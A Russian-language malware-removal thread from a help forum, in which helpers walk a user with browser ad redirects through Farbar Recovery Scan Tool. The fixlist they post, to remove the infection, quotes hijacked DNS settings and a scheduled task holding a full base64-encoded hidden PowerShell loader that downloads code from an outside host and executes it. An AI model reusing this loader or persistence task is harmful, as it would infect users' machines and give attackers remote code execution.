Вирус в Java

Здравствуйте! Прошу помощи в борьбе с вирусом.

Мне кажется, вирус сидит в ява скриптах, потому что в инете идет переадресация со страниц на левые сайты. Открываются левые окна с рекламой, вспыхивают новые окна. ADblock блокирует кучу окошек на сайт yxo.warmportrait.com. Остальные сайты рекламного характера, их много. При блокировке javascript в браузере (опера, интернет эксплорер и др.) проблема исчезает, и все ок работает. Но без скриптов же никак нельзя.
Аваст, avz, доктор веб, cure it вирь не видят. Это как бы обычный ява срипт и вреда особо он не несет. Но сам вирь достал, дико замедляется работа, многие страницы просто намертво вешаются на минуту, пока он там куда-то запросы посылает.
Стандартные гугловские методы не помогли: Ярлыки, расширения в браузерах, поиск ключей в реестре, удаление и установка браузеров.

Помогите, пожалуйста :)
Спасибо!

Уважаемый(ая) [B]konstantinrs[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="http://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].

Интернет через роутер?

да, но на других устройствах, подключенных к нему, проблемы нет.

Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[list][*][b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.[/list]

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.
2. Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]List BCD[/i], [i]Driver MD5[/i] и [i]90 Days Files[/i].
[img]http://i.imgur.com/3munStB.png[/img]
3. Нажмите кнопку [b]Scan[/b].
4. После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет ([b]Addition.txt[/b]).
6. Полученные в пп. 4 и 5 логи заархивируйте (в [b]один архив[/b]) и прикрепите к сообщению.

Готово.
Вирус стал проявлять еще один вид активности: подчеркивает на форумах слова: работа, долг, деньги - делает их гиперссылками, которые отправляют на рекламные сайты.

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

теперь всплывающие окна ссылаются на exo.baulkinginsubordinate.com

1. Откройте [b]Блокнот[/b] и скопируйте в него приведенный ниже текст
[code]
CreateRestorePoint:
Tcpip\Parameters: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{0908ACA4-5365-412E-B3B7-E3627F3BF3A3}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{0908ACA4-5365-412E-B3B7-E3627F3BF3A3}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{FB8C08BC-DB50-4F74-BECD-0D570AD735D9}: [NameServer] 82.163.142.3 95.211.158.130
BHO: No Name -> {8984B388-A5BB-4DF7-B274-77B879E179DB} -> No File
Task: {313231CA-BAA6-4545-A6BF-A79EE41A83D8} - System32\Tasks\{48B87036-E7A5-F936-CCB9-4959CD7258EE} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAbwBvAHQAZgB1AG4ALgBpAG4AZgBvAC8AdQAvAD8AcQA9AEUATwBEAHkAcAB2AGMANgBkAEgAUQBoAEIAZwBGAE0AdwBJAHYAbQBjAEwAdwBJAEUAaQA1AHMAYgBLAEsAbQA2AFcARQA3AFUAUAA3AGgAYwBqAHcATgBSAHAAMgBnAHYAQQBpAG0ARgBOADkALQBhAEYAeQBWAEgANwBuAEEAcwBCAEQAdQA1AHUAYQBjAHMAXwBUADAAbQA1AG8AQQBiAE0AYQBtAEcAdQA4AEwAcQBNAG0AZABUADEAawBNAGMARgB4AEUAawB5AFIANQBBAEkAQgBBAFoAXwBaAGYATwBNAGYASAB4AGYAYQBPAFoAcABDAG0AawBnAEkAWAAwAEkASgB6ADcATgBhAFEAeQBqADAAYgBfAFQAcwBzAG8AdwB0ADAAOQBwAEkAbgBDAE0AdgBHAGkALQBFAG4AcgBwAGwAegBjAE8ARQBPAGEAdQA2AFUAYQA1AEEAXwBWADgAQgBXADcASABKAGwAcQBsADYASgB3AFMAQQBLAFUAWgA2AGYAaABRAFkATgBaAEEAVwBKAGYAZQB3AFIATABNAFoAOQBmAGgARAA5AHIAaABJADcAegA3AE4AMgA0AEcAaQBoAHkARgBWAHUASwBsAEIATwBUAHAAcgBDAGYATQBPAGMARAB1AHcAZwBTADAAYgBBAEYASwA2AGoAcABQAEIAZABmAEYAMwBMAHAATABYADgAOABXADQAZgB5AEsARwBnAEMARgA1AFQANwB3AFIAZgAwAF8AdAAtAC0AcwAzAG8AaABjAHUAWQBMAEEASwBFAFQATABtAGEAdgBZAG8AVwBNAEwATABEAC0ASgBYAHIAeQBMAE4ALQBqAG0AYgBpAG0ARgAzAHIAVABGADkAZAB6AGIAeAA0AHoASgBKAGcAbABFAEoAdwBBAFMAOQBsAFgAaABwAGUANgA2AF8ARAB5AHEAcgBmAEQAWgBQAHUARABEADgAbABBAG8ANgBqAHAAbwBlAFMAVAAtAGoAMABCAFgAQQBNAFQAdQAtAEEAMABNAGgAQwBjAEsAVABTAHYAbwA2ADUAOQBvAFIAbABwAHcASwA3AG8ANQA1AGkARAA0AGwARgBCAFgAWQBrAGMARQBrAFMAZAA0AHUAbgBCAFcAZgBCAFQAMgB6AFIALQBvAHAAYgB2ADUAWgAwAGQATABjAFYAaQA0AFgAQgBEAFMAbAB3AE0AQQA1AHoASABMADgATQB6AGkAQQAmAGMAPQAwAEoASQAwAEUAbwBGAG8ANQBCADQAUwBiAEUALQA5AGgATgBaADAAOAAwADcARgBHAG0ATQB4AFgAbAByAFkAcQBQAGsAcABjAHIASABGAEcASABNAEQAWgAxAFgAZgBaADYAZQBIAHoAOABKAEoAVQBRAF8AagBGAGQAUwB0AF8ANgBfAFEAegBwAE8AdgBZADQAUABLAC0AcgBHAFgAbQBqAHIAXwBvAEEAdwBsAGoAMgBQAHoAcgBaADcAQwBkAGsAYgBUAHcAQgBnADkANwByAEwAMAB2AE0AZgBNAG4AegBMAHcATgBpAFcAUABLAHIAdgA2AEUAZABtAGsANAAzAEcARAB2ADAAOQBJAHYAYQBPAC0ATwBfAFIAQwA0AFcAYgB5AHQAMwBwADEAYwBFAGMAbAB0AGgAYgBsAGEASABPADkATQBnAGMAdABBAEYAeABTADgANAB2AEoAdABZAC0ATQBkAGMAbwBnADcARwAxAHgAMABqAHoAcgBNAFQAbwAwAGwAdABBAHMAOABCAEMARwBQADcAdQBEAE4AYQBhAGMAegBuAG0AWABnAEcAegAwAFYANwBIADkAcgA4AFIAQwBzADcAZgBfAGUAUABMAFQAdwBCADYARwBUAEUAbQBvAEwAdgBlAGcAcABsAHMAdgBKAEwAMwBPAGUAMABVADYAdgBUAHQAOQB5AGMAMQBDADUAbQBtAE8AaQA1AGMAdwBZAFgAYgBxAEgAMgBXAGIAcwBrAF8AVgBFADUAeABLAGoAMgBhAGgATgB6AFUAegBJAE0ASQAyADQASQBJAE8ANgBoADIAQQBQAHoALQA3ADAAVAByAGYAWgBjAE8AYQB0AEkAbQB2AE0AdwBtADEAZwBrAGYAawB3AGsAQgB2AGcAUgBYAFEAYQBUAEcAMwBQAFUAbgBSADcASABYAFMAMwBxAHYAZwB1AFgAZwBSAEwASQA1AGsAeQBFAGEASAB5ADcAWABtAGsAMABrAGoAYQBYAFYATwBMAHMATAAzAG8AQwAtADIAVAB1AEcAVQByADkAcgBEAHkAUgBvAEcAUQBVAFoASQA1ADUAMwBiAGsAcQBNAHcAQgBuAE4ANABOAFcARgAzAFMASAA5ADEAegBTAGQAVwBNAGEAMwAzAEgAQgBiAHAAagBKAGYAOAB4AHYASABhAE4AdgB3AF8AcQByAEYANwA4AFQAcQBHAE4AawBUAGkAcQBaAGsASgBhAE0ATQAxAGEATAA2AHQALQAtAHMAcABOAFQAQQBEAEgASAB3AFMAUwBrAF8AQwBWADAAMgBkAEIAegByAGEAaQB6AC0ASgBpAGMAdQBoAG0ATQBGAEEAdQA1ADkAQgBrADQANAA3AFcARwBxAGkASQByAFcAMwBZAHAAXwBqAEQAUQAwADUAQwBSAE4AdABNADcAaAAzADUAZQA2AHcANgB5ADUAagBOAEkAQQBmAHIARgBZAHoALQBYAF8ATABTAGoATQBRAE0AagBQAG8AawBkAHIAcQByAG4AMQBEAHgAdAB3AFgAYQB2AGEARQBmADQASQBnAEQAbABuADcAWgBzAG8ALQBlAFcAVwBFAFMATQBCAFoAUQAwAGgAYQBHAGEAdQB4AG4AXwAzAFIAaAA1AEUAYgBOADQATQBlAHcAcQA2AHoATAA4AGgANwB1ADEASwBsAHUAVgBoAHQAYgA4AG4AbwBnAGcAdQBYADEAYQB3AFgAdABjAFAAUQBBAC0AQgBjAHgAVwBHADEARwBQAHkAWABLAG0AYQAmAHIAPQA0ADcANgAxADQAOQA1ADEAMAA4ADIANgA2ADkANwAwADUAOAAiADsAJABzAHQAcwBrAD0AIgB7ADQAOABCADgANwAwADMANgAtAEUANwBBADUALQBGADkAMwA2AC0AQwBDAEIAOQAtADQAOQA1ADkAQwBEADcAMgA1ADgARQBFAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Reboot:
[/code]
2. Нажмите [b]Файл[/b] – [b]Сохранить как[/b]
3. Выберите папку, откуда была запущена утилита [b]Farbar Recovery Scan Tool[/b]
4. Укажите [b]Тип файла[/b] – [b]Все файлы (*.*)[/b]
5. Введите имя файла [b]fixlist.txt[/b] и нажмите кнопку [b]Сохранить[/b]
6. Запустите FRST, нажмите один раз на кнопку [b]Fix[/b] и подождите. Программа создаст лог-файл ([b]Fixlog.txt[/b]). Пожалуйста, прикрепите его в следующем сообщении!
[list][*]Обратите внимание, что компьютер будет [b]перезагружен[/b].[/list]

готово :)

Что с проблемой?

изменений никаких, по-прежнему левые сайты от кликов :(

Отключите все установленные расширения для браузеров и проверьте проблему

Целый день - полет нормальный. Никаких баннеров. Огромное спасибо!!!
Если не сложно в двух словах - где вирь сидел и как бороться в следующий раз? Как не подцепить такой же? Вообще у меня уже 6 лет без вирусов и все ОК. Этот вообще понять не могу откуда взялся.

По одному расширению включайте и найдете проблемное. Сообщите нам его имя, а само расширение удалите

так из всех расширений установлено только одно: adblock plus. И то я его установил только после того, как подхватил вирь. После выполнения скрипта днем вирус был при переходе на сайт форума (не этого, но весьма порядочного). Вечером вирус исчез. Расширение было включено в обоих случаях. На следующий день ни днем, ни вечером виря не было в т.ч. на форуме. Но на всякий случай (и за ненадобностью) adblock plus я отключил, т.к. вы сказали это сделать. Получается, вирь - это расширение, которое я в расширениях и не вижу. Или дело не в расширениях.